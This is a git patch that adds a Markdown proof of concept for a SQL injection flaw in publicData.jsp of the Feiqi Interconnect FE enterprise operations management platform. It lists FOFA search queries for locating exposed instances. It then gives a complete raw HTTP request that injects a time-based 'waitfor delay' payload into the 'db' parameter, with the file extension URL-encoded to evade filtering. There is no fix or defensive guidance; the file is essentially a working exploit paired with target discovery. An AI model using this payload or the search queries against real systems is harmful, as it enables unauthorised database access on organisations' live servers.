From 87e1c37b779ef9c4045503640d91398fcde6b405 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 2 Feb 2024 16:15:12 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E9=A3=9E=E4=BC=81=E4=BA=92=E8=81=94-F?= =?UTF-8?q?E=E4=BC=81=E4=B8=9A=E8=BF=90=E8=90=A5=E7=AE=A1=E7=90=86?= =?UTF-8?q?=E5=B9=B3=E5=8F=B0publicData.jsp=E5=AD=98=E5=9C=A8SQL=E6=B3=A8?= =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...业运营管理平台publicData.jsp存在SQL注入漏洞.md | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞.md diff --git a/飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞.md b/飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞.md new file mode 100644 index 0000000..70e02fd --- /dev/null +++ b/飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +## 飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞 + +## fofa +``` +app="FE-协作平台" +app="飞企互联-FE企业运营管理平台" +``` + +## poc +``` +GET /oaerp/ui/common/publicData.js%70?type=getAllTableInfo&db=';waitfor+delay+'0:0:3'-- HTTP/1.1 +Host: ip +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +```